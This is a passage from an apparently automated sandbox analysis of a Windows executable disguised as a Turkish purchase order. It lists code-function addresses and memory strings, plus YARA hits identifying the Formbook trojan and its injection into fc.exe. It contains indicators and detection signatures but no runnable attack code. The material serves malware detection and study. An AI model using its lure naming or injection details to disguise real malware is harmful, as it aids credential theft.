Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01900E59 3_2_01900E59
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0190B1B0 3_2_0190B1B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019CB16B 3_2_019CB16B
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018EF172 3_2_018EF172
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193516C 3_2_0193516C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019070C0 3_2_019070C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019AF0CC 3_2_019AF0CC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B70E9 3_2_019B70E9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BF0E0 3_2_019BF0E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0194739A 3_2_0194739A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B132D 3_2_019B132D
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018ED34C 3_2_018ED34C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019052A0 3_2_019052A0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191B2C0 3_2_0191B2C0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191D2F0 3_2_0191D2F0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A12ED 3_2_019A12ED
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199D5B0 3_2_0199D5B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019C95C3 3_2_019C95C3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B7571 3_2_019B7571
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BF43F 3_2_019BF43F
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018F1460 3_2_018F1460
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BF7B0 3_2_019BF7B0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B16CC 3_2_019B16CC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01945630 3_2_01945630
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01995910 3_2_01995910
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01909950 3_2_01909950
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191B950 3_2_0191B950
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019038E0 3_2_019038E0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0196D800 3_2_0196D800
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191FB80 3_2_0191FB80
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01975BF0 3_2_01975BF0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0193DBF9 3_2_0193DBF9
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BFB76 3_2_019BFB76
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01945AA0 3_2_01945AA0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0199DAAC 3_2_0199DAAC
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019A1AA3 3_2_019A1AA3
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019ADAC6 3_2_019ADAC6
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BFA49 3_2_019BFA49
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B7A46 3_2_019B7A46
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01973A6C 3_2_01973A6C
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_0191FDC0 3_2_0191FDC0
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B1D5A 3_2_019B1D5A
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01903D40 3_2_01903D40
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019B7D73 3_2_019B7D73
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BFCF2 3_2_019BFCF2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01979C32 3_2_01979C32
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01901F92 3_2_01901F92
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BFFB1 3_2_019BFFB1
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C3FD5 3_2_018C3FD5
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_018C3FD2 3_2_018C3FD2
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_019BFF09 3_2_019BFF09
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: 3_2_01909EB0 3_2_01909EB0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D902C0 9_2_02D902C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB0274 9_2_02DB0274
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D1E3F0 9_2_02D1E3F0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DD03E6 9_2_02DD03E6
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCA352 9_2_02DCA352
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DA2000 9_2_02DA2000
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC81CC 9_2_02DC81CC
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DD01AA 9_2_02DD01AA
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC41A2 9_2_02DC41A2
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D98158 9_2_02D98158
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DAA118 9_2_02DAA118
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D00100 9_2_02D00100
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2C6E0 9_2_02D2C6E0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D0C7C0 9_2_02D0C7C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D34750 9_2_02D34750
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D10770 9_2_02D10770
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DBE4F6 9_2_02DBE4F6
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC2446 9_2_02DC2446
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB4420 9_2_02DB4420
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DD0591 9_2_02DD0591
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D10535 9_2_02D10535
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D0EA80 9_2_02D0EA80
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC6BD7 9_2_02DC6BD7
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCAB40 9_2_02DCAB40
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D3E8F0 9_2_02D3E8F0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02CF68B8 9_2_02CF68B8
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D1A840 9_2_02D1A840
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D12840 9_2_02D12840
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D129A0 9_2_02D129A0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DDA9A6 9_2_02DDA9A6
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D26962 9_2_02D26962
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCEEDB 9_2_02DCEEDB
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D22E90 9_2_02D22E90
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCCE93 9_2_02DCCE93
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D10E59 9_2_02D10E59
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCEE26 9_2_02DCEE26
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D02FC8 9_2_02D02FC8
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D8EFA0 9_2_02D8EFA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D84F40 9_2_02D84F40
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D30F30 9_2_02D30F30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB2F30 9_2_02DB2F30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D52F28 9_2_02D52F28
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D00CF2 9_2_02D00CF2
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB0CB5 9_2_02DB0CB5
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D10C00 9_2_02D10C00
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D0ADE0 9_2_02D0ADE0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D28DBF 9_2_02D28DBF
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DACD1F 9_2_02DACD1F
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D1AD00 9_2_02D1AD00
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2B2C0 9_2_02D2B2C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2D2F0 9_2_02D2D2F0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB12ED 9_2_02DB12ED
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D152A0 9_2_02D152A0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D5739A 9_2_02D5739A
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02CFD34C 9_2_02CFD34C
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC132D 9_2_02DC132D
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D170C0 9_2_02D170C0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DBF0CC 9_2_02DBF0CC
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC70E9 9_2_02DC70E9
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCF0E0 9_2_02DCF0E0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D1B1B0 9_2_02D1B1B0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DDB16B 9_2_02DDB16B
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D4516C 9_2_02D4516C
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02CFF172 9_2_02CFF172
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC16CC 9_2_02DC16CC
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D55630 9_2_02D55630
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCF7B0 9_2_02DCF7B0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D01460 9_2_02D01460
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCF43F 9_2_02DCF43F
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DAD5B0 9_2_02DAD5B0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC7571 9_2_02DC7571
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DBDAC6 9_2_02DBDAC6
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D55AA0 9_2_02D55AA0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DADAAC 9_2_02DADAAC
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DB1AA3 9_2_02DB1AA3
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCFA49 9_2_02DCFA49
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC7A46 9_2_02DC7A46
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D83A6C 9_2_02D83A6C
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D85BF0 9_2_02D85BF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D4DBF9 9_2_02D4DBF9
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2FB80 9_2_02D2FB80
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCFB76 9_2_02DCFB76
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D138E0 9_2_02D138E0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D7D800 9_2_02D7D800
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D19950 9_2_02D19950
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2B950 9_2_02D2B950
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DA5910 9_2_02DA5910
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D19EB0 9_2_02D19EB0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D11F92 9_2_02D11F92
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCFFB1 9_2_02DCFFB1
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCFF09 9_2_02DCFF09
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DCFCF2 9_2_02DCFCF2
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D89C32 9_2_02D89C32
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D2FDC0 9_2_02D2FDC0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC1D5A 9_2_02DC1D5A
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02D13D40 9_2_02D13D40
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_02DC7D73 9_2_02DC7D73
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A1A30 9_2_003A1A30
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003BA590 9_2_003BA590
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039CBD0 9_2_0039CBD0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039CBC7 9_2_0039CBC7
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039CDF0 9_2_0039CDF0
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039AE70 9_2_0039AE70
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0039AE66 9_2_0039AE66
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A357B 9_2_003A357B
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_003A3580 9_2_003A3580
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0302A116 9_2_0302A116
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0302BA24 9_2_0302BA24
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0302B904 9_2_0302B904
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0302AE28 9_2_0302AE28
Source: C:\Windows\SysWOW64\fc.exe Code function: 9_2_0302BDBC 9_2_0302BDBC
Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02D7EA12 appears 86 times
Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02D57E54 appears 107 times
Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02D45130 appears 58 times
Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02CFB970 appears 262 times
Source: C:\Windows\SysWOW64\fc.exe Code function: String function: 02D8F290 appears 103 times
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: String function: 01935130 appears 58 times
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: String function: 0196EA12 appears 86 times
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: String function: 01947E54 appears 107 times
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: String function: 0197F290 appears 103 times
Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Code function: String function: 018EB970 appears 262 times
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720342797.0000000007160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1723792983.000000000D570000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1684163629.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136699590.00000000019ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.0000000001467000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000003.00000002.2136436836.000000000147C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Binary or memory string: OriginalFilenamerZwD.exe> vs 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.d570000.7.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, qCgbVWn8uxKFfceDdd.cs Security API names: _0020.AddAccessRule
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.49c5790.3.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.4a8cdb0.2.raw.unpack, fOm1m09TqPZZgHoxih.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
